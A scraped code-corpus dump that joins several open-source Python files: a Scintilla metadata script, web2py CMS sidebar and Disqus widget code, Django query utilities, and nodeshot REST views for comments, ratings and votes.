modules.append(l.split()[1])
return modules
# Properties that start with lexer. or fold. are automatically found but there are some
# older properties that don't follow this pattern so must be explicitly listed.
knownIrregularProperties = [
"fold",
"styling.within.preprocessor",
"tab.timmy.whinge.level",
"asp.default.language",
"html.tags.case.sensitive",
"ps.level",
"ps.tokenize",
"sql.backslash.escapes",
"nsis.uservars",
"nsis.ignorecase"
]
def FindProperties(lexFile):
properties = {}
with open(lexFile) as f:
for l in f.readlines():
if ("GetProperty" in l or "DefineProperty" in l) and "\"" in l:
l = l.strip()
if not l.startswith("//"): # Drop comments
propertyName = l.split("\"")[1]
if propertyName.lower() == propertyName:
# Only allow lower case property names
if propertyName in knownIrregularProperties or \
propertyName.startswith("fold.") or \
propertyName.startswith("lexer."):
properties[propertyName] = 1
return properties
def FindPropertyDocumentation(lexFile):
documents = {}
with open(lexFile) as f:
name = ""
for l in f.readlines():
l = l.strip()
if "// property " in l:
propertyName = l.split()[2]
if propertyName.lower() == propertyName:
# Only allow lower case property names
name = propertyName
documents[name] = ""
elif "DefineProperty" in l and "\"" in l:
propertyName = l.split("\"")[1]
if propertyName.lower() == propertyName:
# Only allow lower case property names
name = propertyName
documents[name] = ""
elif name:
if l.startswith("//"):
if documents[name]:
documents[name] += " "
documents[name] += l[2:].strip()
elif l.startswith("\""):
l = l[1:].strip()
if l.endswith(";"):
l = l[:-1].strip()
if l.endswith(")"):
l = l[:-1].strip()
if l.endswith("\""):
l = l[:-1]
# Fix escaped double quotes
l = l.replace("\\\"", "\"")
documents[name] += l
else:
name = ""
for name in list(documents.keys()):
if documents[name] == "":
del documents[name]
return documents
def FindCredits(historyFile):
credits = []
stage = 0
with codecs.open(historyFile, "r", "utf-8") as f:
for l in f.readlines():
l = l.strip()
if stage == 0 and l == "<table>":
stage = 1
elif stage == 1 and l == "</table>":
stage = 2
if stage == 1 and l.startswith("<td>"):
credit = l[4:-5]
if "<a" in l:
title, a, rest = credit.partition("<a href=")
urlplus, bracket, end = rest.partition(">")
name = end.split("<")[0]
url = urlplus[1:-1]
credit = title.strip()
if credit:
credit += " "
credit += name + " " + url
credits.append(credit)
return credits
def ciCompare(a,b):
return cmp(a.lower(), b.lower())
def ciKey(a):
return a.lower()
def SortListInsensitive(l):
try: # Try key function
l.sort(key=ciKey)
except TypeError: # Earlier version of Python, so use comparison function
l.sort(ciCompare)
class ScintillaData:
def __init__(self, scintillaRoot):
# Discover verion information
with open(scintillaRoot + "version.txt") as f:
self.version = f.read().strip()
self.versionDotted = self.version[0] + '.' + self.version[1] + '.' + \
self.version[2]
self.versionCommad = self.version[0] + ', ' + self.version[1] + ', ' + \
self.version[2] + ', 0'
with open(scintillaRoot + "doc/index.html") as f:
self.dateModified = [l for l in f.readlines() if "Date.Modified" in l]\
[0].split('\"')[3]
# 20130602
# index.html, SciTE.html
dtModified = datetime.datetime.strptime(self.dateModified, "%Y%m%d")
self.yearModified = self.dateModified[0:4]
monthModified = dtModified.strftime("%B")
dayModified = "%d" % dtModified.day
self.mdyModified = monthModified + " " + dayModified + " " + self.yearModified
# May 22 2013
# index.html, SciTE.html
self.dmyModified = dayModified + " " + monthModified + " " + self.yearModified
# 22 May 2013
# ScintillaHistory.html -- only first should change
self.myModified = monthModified + " " + self.yearModified
# Find all the lexer source code files
lexFilePaths = glob.glob(scintillaRoot + "lexers/Lex*.cxx")
SortListInsensitive(lexFilePaths)
self.lexFiles = [os.path.basename(f)[:-4] for f in lexFilePaths]
self.lexerModules = []
lexerProperties = set()
self.propertyDocuments = {}
for lexFile in lexFilePaths:
self.lexerModules.extend(FindModules(lexFile))
for k in FindProperties(lexFile).keys():
lexerProperties.add(k)
documents = FindPropertyDocumentation(lexFile)
for k in documents.keys():
if k not in self.propertyDocuments:
self.propertyDocuments[k] = documents[k]
SortListInsensitive(self.lexerModules)
self.lexerProperties = list(lexerProperties)
SortListInsensitive(self.lexerProperties)
self.credits = FindCredits(scintillaRoot + "doc/ScintillaHistory.html")
def printWrapped(text):
print(textwrap.fill(text, subsequent_indent=" "))
if __name__=="__main__":
sci = ScintillaData("../")
print("Version %s %s %s" % (sci.version, sci.versionDotted, sci.versionCommad))
print("Date last modified %s %s %s %s %s" % (
sci.dateModified, sci.yearModified, sci.mdyModified, sci.dmyModified, sci.myModified))
printWrapped(str(len(sci.lexFiles)) + " lexer files: " + ", ".join(sci.lexFiles))
printWrapped(str(len(sci.lexerModules)) + " lexer modules: " + ", ".join(sci.lexerModules))
printWrapped("Lexer properties: " + ", ".join(sci.lexerProperties))
print("Lexer property documentation:")
documentProperties = list(sci.propertyDocuments.keys())
SortListInsensitive(documentProperties)
for k in documentProperties:
print(" " + k)
print(textwrap.fill(sci.propertyDocuments[k], initial_indent=" ",
subsequent_indent=" "))
print("Credits:")
for c in sci.credits:
if sys.version_info[0] == 2:
print(" " + c.encode("utf-8"))
else:
sys.stdout.buffer.write(b" " + c.encode("utf-8") + b"\n")
| gpl-2.0 |
ijoewahjoedi/instant-press | modules/widgets.py | 6 | 28658 | # -*- coding: utf-8 -*-
#
# Instant Press. Instant sites. CMS developed in Web2py Framework
# Site: http://www.instant2press.com
#
# Copyright (c) 2010 Mulone, Pablo Martín
#
# License Code: GPL, General Public License v. 2.0
# License Content: Creative Commons Attribution 3.0
#
# Also visit: www.web2py.com
# or Groups: http://groups.google.com/group/web2py
# http://groups.google.com/group/web2py-usuarios
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from gluon.html import *
from gluon.http import *
from gluon.validators import *
from gluon.sqlhtml import *
import gluon.contrib.simplejson as sj
#local
from utils import *
class Widgets(object):
def __init__(self, i2p):
self.i2p = i2p
def get_menu(self):
db = self.i2p.db
T = self.i2p.environment.T
request = self.i2p.environment.request
config = self.i2p.config
articles = self.i2p.articles
#this list the top pages
#the maximun display lenght of title is 25 characters
xml_pages=""
trunk_title = 25
(pages, pages_count) = articles.get_last_pages(1)
for page in pages:
(url, notvalid) = (IS_URL()(page.post_url))
if notvalid: #this is a normal post
link_page = articles.get_page_permanent_link(page.id, \
page.title[:trunk_title])
else: #this is a url-post
link_page = A(page.title[:trunk_title], _href=page.post_url)
xml_page = '<li>%s</li>' % link_page.xml()
#xml_pages += sanitate_string(xml_page)
xml_pages += xml_page
link_home = A(T('Home'), _href=URL(request.application,\
config.controller_default,\
'index'))
xml_menu='<ul><li>%s</li> %s </ul>' % (link_home,xml_pages)
return xml_menu
def front(self):
config = self.i2p.config
siteinfo = self.i2p.siteinfo
if config.front_enabled:
welcome_description = '<div class="entry">%s</div>' \
% siteinfo._get_frontpage()
xml = '<div class="post"> %s </div>' % welcome_description
else:
xml=""
return xml
def sidebar_aboutme(self):
db = self.i2p.db
T = self.i2p.environment.T
request = self.i2p.environment.request
config = self.i2p.config
siteinfo = self.i2p.siteinfo
about_xml = ""
if config.about_enabled:
about_caption = T('About')
about_info = siteinfo._get_aboutme()
if about_info != "":
about_description = '%s' % about_info
about_xml = '<div id="sidebar-about"><h2>%s</h2> %s </div>' \
% (about_caption, about_description)
return about_xml
def sidebar_archive(self):
config = self.i2p.config
articles = self.i2p.articles
archive_xml = ""
if config.archive_enabled:
archive_generate=""
if not config.widgets_ajax:
archive_generate = articles.get_list_archives()
archive_xml = '<div id="sidebar-archive"> %s </div>' % archive_generate
return archive_xml
def footer_archive(self):
config = self.i2p.config
articles = self.i2p.articles
archive_xml = ""
if config.archive_enabled:
archive_generate=""
if not config.widgets_ajax:
archive_generate = articles.get_list_archives()
archive_xml = '<div id="footer-widgets-archives" class="footer-columns"> %s </div>' \
% archive_generate
return archive_xml
def get_pages(self):
T = self.i2p.environment.T
pages_caption = T('Pages')
pages_generate = self.get_menu()
xml_pages = '<h2>%s</h2> %s' % (pages_caption,pages_generate)
return xml_pages
def sidebar_pages(self):
config = self.i2p.config
pages_xml = ""
if config.pages_enabled:
pages_generate=""
if not config.widgets_ajax:
pages_generate = self.get_pages()
pages_xml = '<div id="sidebar-pages"> %s </div>' % (pages_generate)
return pages_xml
def footer_pages(self):
config = self.i2p.config
pages_xml = ""
if config.pages_enabled:
pages_generate=""
if not config.widgets_ajax:
pages_generate = self.get_pages()
pages_xml = '<div id="footer-widgets-pages" class="footer-columns"> %s </div>' \
% (pages_generate)
return pages_xml
def sidebar_links(self):
config = self.i2p.config
articles = self.i2p.articles
links_xml = ""
if config.pages_enabled:
links_generate=""
if not config.widgets_ajax:
links_generate = articles.get_list_links()
links_xml = '<div id="sidebar-links"> %s </div>' % (links_generate)
return links_xml
def load_last_comments(self, page=1):
db = self.i2p.db
T = self.i2p.environment.T
request = self.i2p.environment.request
xml_comments=""
last_comments=""
header = T('Last comments')
(limit_inf, limit_sup) = get_query_limits(page, 5) #the last five comments
query = (db.comments.id>0)
last_comments = db(query).select(db.comments.ALL,\
orderby=~db.comments.comment_on,\
limitby=(limit_inf, limit_sup))
for comment in last_comments:
#author_avatar = IMG(_src=URL(r=request,c='static',f='images/avatar.png'), alt="avatar", style="padding: 5px; float:left;")
author_sytle = ""#"padding: 5px; float:left;"
author_avatar = self.i2p.comments._get_avatar(comment.author_id,\
style=author_sytle)
text_comment = comment.comment[:60]
comment_user = self.i2p.users.get_user_title(comment.author_id)
comment_time = comment.comment_on.strftime("%B %d, %Y:%I:%M %p")
link_post = self.i2p.articles.get_post_permanent_link(comment.post_id)
xml_comment = '<li><div style="float:left">%s</div> %s say: %s on %s on article %s</li>' \
% (author_avatar.xml(), comment_user, text_comment, \
comment_time, link_post.xml())
#xml_comments += sanitate_string(xml_comment)
xml_comments += xml_comment
if xml_comments!="":
last_comments="<h2>%s</h2><ul>%s</ul>" % (header,xml_comments)
return last_comments
def sidebar_last_comments(self):
comments_xml = ""
config = self.i2p.config
if config.comments_method in ['Disqus']:
comments_xml = '<div id="sidebar-last-comments"> %s </div>' % self._disqus_last_comments()
elif config.comments_method in ['Enabled']:
comments_generate=""
if not config.widgets_ajax:
comments_generate = self.load_last_comments()
comments_xml = '<div id="sidebar-last-comments"> %s </div>' % (comments_generate)
return comments_xml
def sidebar_tags(self):
config = self.i2p.config
articles = self.i2p.articles
tags_xml = ""
if config.tags_enabled:
tags_generate=""
if not config.widgets_ajax:
tags_generate = articles.get_popular_tags()
tags_xml = '<div id="sidebar-tags">%s</div><div style="clear: both; float: none;"></div>' \
% tags_generate
return tags_xml
def sidebar_feed(self):
T = self.i2p.environment.T
request = self.i2p.environment.request
config = self.i2p.config
feed_xml = ""
if config.feed_enabled:
feed_caption = T('Rss')
icon_feed_url = URL(request.application,'static','images/feed.png')
img_feed = IMG(_src=icon_feed_url, _alt="Feed", _style="padding-left: 5px;")
link_feedposts = A(T("Rss last posts"), \
_href=URL(request.application,\
config.controller_default,\
'feed_articles.rss' ))
link_feedcomments = A(T("Rss last comments"), \
_href=URL(request.application,\
config.controller_default,\
'feed_comments.rss' ))
feed_posts = '<li>%s %s</li>' % (link_feedposts, img_feed.xml())
feed_comments = '<li>%s %s</li>' % (link_feedcomments, img_feed.xml())
feed_xml = '<div id="sidebar-feed"><h2>%s</h2> <ul> %s %s </ul> </div>' \
% (feed_caption, feed_posts, feed_comments)
return feed_xml
def load_last_posts(self):
articles = self.i2p.articles
T = self.i2p.environment.T
request = self.i2p.environment.request
xml_posts=""
last_posts=""
last_entries = T('Last entries')
(posts, post_count) = articles.get_last_posts(1)
for post in posts:
link_post = articles.get_post_permanent_link(post.id, \
post.title)
xml_post = '<li>%s</li>' % link_post.xml()
xml_posts += xml_post
if xml_posts!="":
last_posts="<h2>%s</h2><ul>%s</ul>" % (last_entries,xml_posts)
return last_posts
def sidebar_last_posts(self):
config = self.i2p.config
last_posts=''
if config.last_post_enabled:
xml_posts=""
if not config.widgets_ajax:
xml_posts = self.load_last_posts()
last_posts='<div id="sidebar-last-posts">%s</div>' % xml_posts
return last_posts
def footer_last_posts(self):
config = self.i2p.config
last_posts=''
if config.last_post_enabled:
xml_posts=""
if not config.widgets_ajax:
xml_posts = self.load_last_posts()
last_posts='<div id="footer-widgets-last-posts" class="footer-columns">%s</div>' \
% xml_posts
return last_posts
def load_categories(self):
config = self.i2p.config
db = self.i2p.db
T = self.i2p.environment.T
request = self.i2p.environment.request
xml_cats=""
categories=""
cats = self.i2p.categories.get_list(page=1, limit=30)
for cat in cats:
post_count = db(db.posts.categories.contains(str(cat.id))).count() #contains bug in web2py
text_cat = " %s (%s)" % (cat.title,post_count)
link_cat = A(text_cat,_title="%s"%cat.description,\
_href=URL(request.application,\
config.controller_default,\
'category/by_id', args=[unicode(cat.id)] ))
xml_cat = '<li>%s</li>' % link_cat.xml()
xml_cats += xml_cat
if xml_cats!="":
categories = "<h2>%s</h2>"%T('Categories')
categories += "<ul>%s</ul>"%xml_cats
return categories
def sidebar_categories(self):
config = self.i2p.config
xml_categories = ""
if config.categories_enabled:
xml_cats=""
if not config.widgets_ajax:
xml_cats = self.load_categories()
xml_categories='<div id="sidebar-categories">%s</div>' % xml_cats
return xml_categories
def footer_categories(self):
config = self.i2p.config
xml_categories = ""
if config.categories_enabled:
xml_cats=""
if not config.widgets_ajax:
xml_cats = self.load_categories()
xml_categories='<div id="footer-widgets-categories" class="footer-columns">%s</div>' \
% xml_cats
return xml_categories
def sidebar_search(self):
config = self.i2p.config
T = self.i2p.environment.T
request = self.i2p.environment.request
xml_content = ""
if config.search_enabled:
title_search = T('Search')
search_url = URL(request.application, \
config.controller_default,\
'search')
xml_content = '''<div id="sidebar-search" >
<h2>%s</h2>
<form method="get" action="%s">
<div><input type="text" name="q" id="sidebar-search-text" value="" /></div>
<div><input type="submit" id="sidebar-search-submit" value="Search" /></div>
</form>
</div>
''' % (title_search,search_url)
return xml_content
def add_this(self, url="",title="",description=""):
config = self.i2p.config
#need fix: need to escape to somethin like: &
if title!='':
addthis_title = 'addthis:title="%s"' % clean_html(title)
else:
addthis_title = ''
if url!='':
addthis_url = 'addthis:url="%s"' % url
else:
addthis_url = ''
if description!='':
addthis_description = 'addthis:description="%s"' % clean_html(description)
else:
addthis_description = ''
addthis = '''<!-- AddThis Button BEGIN -->
<div class="addthis_toolbox addthis_default_style">
<a href="http://www.addthis.com/bookmark.php?v=250&username=%(username)s" class="addthis_button_compact" %(url)s %(title)s %(description)s >Share</a>
<span class="addthis_separator">|</span>
<a class="addthis_button_facebook" %(url)s %(title)s %(description)s></a>
<a class="addthis_button_myspace" %(url)s %(title)s %(description)s></a>
<a class="addthis_button_google" %(url)s %(title)s %(description)s></a>
<a class="addthis_button_twitter" %(url)s %(title)s %(description)s></a>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=%(username)s"></script>
<!-- AddThis Button END --> ''' % {'username': config.addthis_user, 'url': addthis_url, 'title': addthis_title, 'description': addthis_description}
return addthis
def post_meta(self, post):
T = self.i2p.environment.T
request = self.i2p.environment.request
config = self.i2p.config
articles = self.i2p.articles
users = self.i2p.users
post_author_caption = '<span class="author">%s</span>' \
% users.get_user_title(post.created_by_id)
post_category = articles.get_post_category(post.id)
if post_category=="":
post_category = T("uncategorized")
in_category = T('in')
else:
in_category = T('in categories')
#post_time = post.published_on.strftime("%B %d, %Y at %I:%M")
post_time = post.published_on.strftime("%Y-%m-%d %I:%M")
year_full = post.published_on.strftime("%Y")
month = post.published_on.strftime("%m")
link_time = A(post_time, _href=URL(request.application,\
config.controller_default,\
'archives',args=[year_full,month]))
posted_by = T('By')
updated_on = T('Published on')
byline = '%s %s %s %s %s %s' % (updated_on, link_time.xml(), posted_by, \
post_author_caption, in_category, post_category)
return byline
def post_extract(self, post):
config = self.i2p.config
T = self.i2p.environment.T
request = self.i2p.environment.request
comments = self.i2p.comments
articles = self.i2p.articles
label_comments = "%s" % T('Comments')
if config.comments_method in ['Enabled'] and not config.widgets_ajax:
comments_count = comments._get_comment_count(post.id)
elif config.comments_method in ['Disqus']:
comments_count = ""
else:
comments_count = 0
if config.comments_method in ['Disqus']:
link_comments = articles.get_post_permanent_link(post.id, \
'Comments', \
'disqus_thread')
else:
link_comments = articles.get_post_permanent_link(post.id, \
label_comments, \
'comments')
link_readmore = articles.get_post_permanent_link(post.id, T("Read more"))
base_http = 'http://' + str(request.env.http_host)
url_permanent = articles.get_post_permanent_link(post.id, only_url=True )
url_post = str(base_http + url_permanent)
if config.addthis_enabled:
#add_this = self.add_this(url_post,post.title,post.text_slice[:100]) #need to pass: title, url, description
add_this = self.add_this(url_permanent,post.title,post.text_slice[:100]) #need to pass: title, url, description
else:
add_this = ""
xml_post = '<div class="post">'
xml_post +='<h2 class="title">%s</h2>' \
% articles.get_post_permanent_link(post.id).xml()
xml_post +='''<div class="meta">%s -
<span class="comments-count" id="comments-count_%s"> %s </span>
%s
</div>''' \
% (self.post_meta(post), post.id, comments_count, link_comments.xml())
if config.editor_language in ['Markmin']:
text_slice = MARKMIN(post.text_slice)
else:
text_slice = post.text_slice
xml_post +='<div class="entry">%s</div>' % text_slice
xml_post +='''<div class="links">
<div class="readmore"> %s </div>
<div class="addthis"> %s </div>
<div style="float:none; clear:both;"></div>
</div>''' % (link_readmore.xml(), add_this)
xml_post +='</div>'
return xml_post
def last_posts(self, page):
articles = self.i2p.articles
(posts, count_posts) = articles.get_last_posts(page)
xml_posts = articles.get_xml_results_from_posts(posts)
xml_posts += articles.pagination_last_post(page, count_posts)
return xml_posts
def disqus_comments(self):
config = self.i2p.config
if config.disqus_dev:
developer = 'var disqus_developer = 1;';
else:
developer = '';
script = '''
<div id="disqus_thread"></div>
<script type="text/javascript">
%(developer)s
/**
* var disqus_identifier; [Optional but recommended: Define a unique identifier (e.g. post id or slug) for this thread]
*/
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = 'http://%(site)s.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript=%(site)s">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">blog comments powered by <span class="logo-disqus">Disqus</span></a>
''' % {'developer': developer, 'site': config.disqus_site}
return script
def disqus_comments_count(self):
config = self.i2p.config
script = '''
<script type="text/javascript">
var disqus_shortname = '%(site)s';
(function () {
var s = document.createElement('script'); s.async = true;
s.src = 'http://disqus.com/forums/%(site)s/count.js';
(document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
}());
</script>
''' % {'site': config.disqus_site}
return script
def _disqus_last_comments(self):
T = self.i2p.environment.T
config = self.i2p.config
if self.i2p.config.avatars_enabled:
hide_avatars = 0
else:
hide_avatars = 1
avatar_size = self.i2p.config.avatar_size
recent_comments=T("Recent Comments")
num_items = 5
script = '''
<div id="recentcomments" class="dsq-widget">
<h2 class="dsq-widget-title">%(recent_comments)s</h2>
<script type="text/javascript" src="http://disqus.com/forums/%(site)s/recent_comments_widget.js?num_items=%(num_items)s&hide_avatars=%(hide_avatars)s&avatar_size=%(avatar_size)s&excerpt_length=200">
</script>
</div>
<a href="http://disqus.com/">Powered by Disqus</a>
''' % {'site': config.disqus_site, 'recent_comments': recent_comments, 'avatar_size': avatar_size, 'hide_avatars': hide_avatars, 'num_items': num_items}
return script
def sidebar_popular_threads(self):
config = self.i2p.config
popular_threads=''
#for now only in disqus
if config.comments_method in ['Disqus']:
popular_threads='<div id="sidebar-popular-threads">%s</div>' % self._disqus_popular_threads()
return popular_threads
def _disqus_popular_threads(self):
config = self.i2p.config
T = self.i2p.environment.T
popular_threads=T("Popular Threads")
script = '''
<div id="popularthreads" class="dsq-widget">
<h2 class="dsq-widget-title">%(popular_threads)s</h2>
<script type="text/javascript" src="http://disqus.com/forums/%(site)s/popular_threads_widget.js?num_items=5">
</script>
</div>
<a href="http://disqus.com/">Powered by Disqus</a>
'''% {'site': config.disqus_site,'popular_threads':popular_threads}
return script
def sidebar_top_commenters(self):
config = self.i2p.config
top_commenters=''
#for now only in disqus
if config.comments_method in ['Disqus']:
top_commenters='<div id="sidebar-top-commenters">%s</div>' % self._disqus_top_commenters()
return top_commenters
def _disqus_top_commenters(self):
T = self.i2p.environment.T
config = self.i2p.config
avatar_size = self.i2p.config.avatar_size
if self.i2p.config.avatars_enabled:
hide_avatars = 0
else:
hide_avatars = 1
num_items = 5
top_commenters=T('Top Commenters')
script = '''
<div id="topcommenters" class="dsq-widget">
<h2 class="dsq-widget-title">%(top_commenters)s</h2>
<script type="text/javascript" src="http://disqus.com/forums/%(site)s/top_commenters_widget.js?num_items=%(num_items)s&hide_mods=0&hide_avatars=%(hide_avatars)s&avatar_size=%(avatar_size)s">
</script>
</div>
<a href="http://disqus.com/">Powered by Disqus</a>
'''% {'site': config.disqus_site, 'top_commenters':top_commenters, 'avatar_size':avatar_size, 'hide_avatars':hide_avatars, 'num_items':num_items}
return script
def sidebar_combination(self):
config = self.i2p.config
T = self.i2p.environment.T
head_combination = T('Posts')
combination=''
#for now only in disqus
if config.comments_method in ['Disqus']:
combination='<div id="sidebar-combination"><h2>%s</h2>%s</div>' % (head_combination, self._disqus_combination())
return combination
def _disqus_combination(self):
config = self.i2p.config
num_items = 5
script = '''
<script type="text/javascript" src="http://disqus.com/forums/%(site)s/combination_widget.js?num_items=%(num_items)s&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200">
</script>
<a href="http://disqus.com/">Powered by Disqus</a>
'''% {'site': config.disqus_site, 'num_items':num_items}
return script
def ga_script(self):
config = self.i2p.config
script=""
if config.ga_enabled:
script = '''
<script>
var _gaq = [['_setAccount', '%(ga_id)s'], ['_trackPageview']];
(function(d, t) {
var g = d.createElement(t),
s = d.getElementsByTagName(t)[0];
g.async = true;
g.src = '//www.google-analytics.com/ga.js';
s.parentNode.insertBefore(g, s);
})(document, 'script');
</script>
''' % {'ga_id': config.ga_id}
return script
| gpl-2.0 |
umitproject/tease-o-matic | django/db/models/query_utils.py | 240 | 5799 | """
Various data structures used in query construction.
Factored out from django.db.models.query to avoid making the main module very
large and/or so that they can be used by other modules without getting into
circular import difficulties.
"""
import weakref
from django.utils.copycompat import deepcopy
from django.db.backends import util
from django.utils import tree
from django.utils.datastructures import SortedDict
class InvalidQuery(Exception):
"""
The query passed to raw isn't a safe query to use with raw.
"""
pass
class QueryWrapper(object):
"""
A type that indicates the contents are an SQL fragment and the associate
parameters. Can be used to pass opaque data to a where-clause, for example.
"""
def __init__(self, sql, params):
self.data = sql, params
def as_sql(self, qn=None, connection=None):
return self.data
class Q(tree.Node):
"""
Encapsulates filters as objects that can then be combined logically (using
& and |).
"""
# Connection types
AND = 'AND'
OR = 'OR'
default = AND
def __init__(self, *args, **kwargs):
super(Q, self).__init__(children=list(args) + kwargs.items())
def _combine(self, other, conn):
if not isinstance(other, Q):
raise TypeError(other)
obj = type(self)()
obj.add(self, conn)
obj.add(other, conn)
return obj
def __or__(self, other):
return self._combine(other, self.OR)
def __and__(self, other):
return self._combine(other, self.AND)
def __invert__(self):
obj = type(self)()
obj.add(self, self.AND)
obj.negate()
return obj
class DeferredAttribute(object):
"""
A wrapper for a deferred-loading field. When the value is read from this
object the first time, the query is executed.
"""
def __init__(self, field_name, model):
self.field_name = field_name
self.model_ref = weakref.ref(model)
self.loaded = False
def __get__(self, instance, owner):
"""
Retrieves and caches the value from the datastore on the first lookup.
Returns the cached value.
"""
from django.db.models.fields import FieldDoesNotExist
assert instance is not None
cls = self.model_ref()
data = instance.__dict__
if data.get(self.field_name, self) is self:
# self.field_name is the attname of the field, but only() takes the
# actual name, so we need to translate it here.
try:
cls._meta.get_field_by_name(self.field_name)
name = self.field_name
except FieldDoesNotExist:
name = [f.name for f in cls._meta.fields
if f.attname == self.field_name][0]
# We use only() instead of values() here because we want the
# various data coersion methods (to_python(), etc.) to be called
# here.
val = getattr(
cls._base_manager.filter(pk=instance.pk).only(name).using(
instance._state.db).get(),
self.field_name
)
data[self.field_name] = val
return data[self.field_name]
def __set__(self, instance, value):
"""
Deferred loading attributes can be set normally (which means there will
never be a database lookup involved.
"""
instance.__dict__[self.field_name] = value
def select_related_descend(field, restricted, requested, reverse=False):
"""
Returns True if this field should be used to descend deeper for
select_related() purposes. Used by both the query construction code
(sql.query.fill_related_selections()) and the model instance creation code
(query.get_cached_row()).
Arguments:
* field - the field to be checked
* restricted - a boolean field, indicating if the field list has been
manually restricted using a requested clause)
* requested - The select_related() dictionary.
* reverse - boolean, True if we are checking a reverse select related
"""
if not field.rel:
return False
if field.rel.parent_link and not reverse:
return False
if restricted:
if reverse and field.related_query_name() not in requested:
return False
if not reverse and field.name not in requested:
return False
if not restricted and field.null:
return False
return True
# This function is needed because data descriptors must be defined on a class
# object, not an instance, to have any effect.
def deferred_class_factory(model, attrs):
"""
Returns a class object that is a copy of "model" with the specified "attrs"
being replaced with DeferredAttribute objects. The "pk_value" ties the
deferred attributes to a particular instance of the model.
"""
class Meta:
proxy = True
app_label = model._meta.app_label
# The app_cache wants a unique name for each model, otherwise the new class
# won't be created (we get an old one back). Therefore, we generate the
# name using the passed in attrs. It's OK to reuse an existing class
# object if the attrs are identical.
name = "%s_Deferred_%s" % (model.__name__, '_'.join(sorted(list(attrs))))
name = util.truncate_name(name, 80, 32)
overrides = dict([(attr, DeferredAttribute(attr, model))
for attr in attrs])
overrides["Meta"] = Meta
overrides["__module__"] = model.__module__
overrides["_deferred"] = True
return type(name, (model,), overrides)
# The above function is also used to unpickle model instances with deferred
# fields.
deferred_class_factory.__safe_for_unpickling__ = True
| bsd-3-clause |
chachan/nodeshot | nodeshot/community/participation/views.py | 5 | 2627 | from django.utils.translation import ugettext_lazy as _
from django.shortcuts import get_object_or_404
from django.contrib.auth import get_user_model
User = get_user_model()
from rest_framework import permissions, authentication, generics
from rest_framework.response import Response
from nodeshot.core.nodes.models import Node
from .models import Rating, Vote, Comment
from .serializers import * # noqa
class NodeRelationViewMixin(object):
def initial(self, request, *args, **kwargs):
"""
Custom initial method:
* ensure node exists and store it in an instance attribute
* change queryset to return only comments of current node
"""
super(NodeRelationViewMixin, self).initial(request, *args, **kwargs)
self.node = get_object_or_404(Node, **{'slug': self.kwargs['slug']})
self.queryset = self.model.objects.filter(node_id=self.node.id)
def perform_create(self, serializer):
serializer.save(user=self.request.user)
class NodeComments(NodeRelationViewMixin, generics.ListCreateAPIView):
"""
### GET
Retrieve a **list** of comments for the specified node
### POST
Add a comment to the specified node
"""
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
serializer_class = CommentSerializer
model = Comment
node_comments = NodeComments.as_view()
class NodeRatings(NodeRelationViewMixin, generics.CreateAPIView):
"""
### POST
Rate the specified node
"""
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
serializer_class = RatingSerializer
model = Rating
node_ratings = NodeRatings.as_view()
class NodeVotes(NodeRelationViewMixin, generics.CreateAPIView):
"""
### POST
Vote for the specified node
"""
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
serializer_class = VoteSerializer
model = Vote
def delete(self, *args, **kwargs):
votes = Vote.objects.filter(node_id=self.node.id, user_id=self.request.user.id)
if (len(votes) > 0):
for vote in votes:
vote.delete()
message = _('Vote for this node removed')
status = 200
else:
message = _('User has not voted this node yet')
status = 400
return Response({'details': message}, status=status)
node_votes = NodeVotes.as_view()
| gpl-3.0 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.